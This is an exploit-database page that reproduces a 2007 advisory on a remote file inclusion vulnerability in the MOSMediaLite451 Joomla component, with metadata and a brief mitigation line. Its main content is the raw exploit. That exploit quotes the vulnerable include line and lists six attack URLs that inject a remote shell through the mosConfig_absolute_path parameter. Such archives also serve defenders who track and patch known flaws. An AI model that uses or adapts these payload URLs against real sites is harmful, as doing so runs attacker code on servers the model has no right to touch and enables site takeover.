header-logo
Suggest Exploit
vendor:
MOSMediaLite451
by:
k1n9k0ng
7.5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: MOSMediaLite451
Affected Version From: MOSMediaLite451
Affected Version To: MOSMediaLite451
Patch Exists: NO
Related CWE:
CPE: a:mosmedialite:mosmedialite451
Metasploit:
Other Scripts:
Platforms Tested:
2007

MOSMediaLite451 Exploit

The MOSMediaLite451 script is vulnerable to remote file inclusion. The vulnerability allows an attacker to include and execute arbitrary files from a remote server by manipulating the 'mosConfig_absolute_path' parameter in various PHP files.

Mitigation:

The vendor should release a patch to fix the vulnerability. In the meantime, users are advised to remove or restrict access to the affected files.
Source

Exploit-DB raw data:

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Scripts         : MOSMediaLite451
Discovered By   : k1n9k0ng
Scripts site    : http://www.djoomla.com/component/option,com_remository/Itemid,2/func,fileinfo/id,104/
Thanks To       : #sekuritionline, #semprol, #bajingan, #mimid, #r.i.p, #x-code, #yogyafree
special To      : adhietslank, babypunk, cyberlog, cah_gemblunkz, the_sims, ARiee, letjen, k1tk4t
site            : www.sekuritionline.net
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

bug Script:
include_once( $mosConfig_absolute_path . "/administrator/components/com_mosmedia/mosmedia.config.php" );

bug found:
"http://www.site.net/administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=[shell] "
"http://www.site.net/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=[shell] "
"http://www.site.net/administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=[shell] "
"http://www.site.net/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=[shell] "
"http://www.site.net/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=[shell] "
"http://www.site.net/administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=[shell] " 

# milw0rm.com [2007-10-08]

Navigation

Suggest Exploit

Services By CQR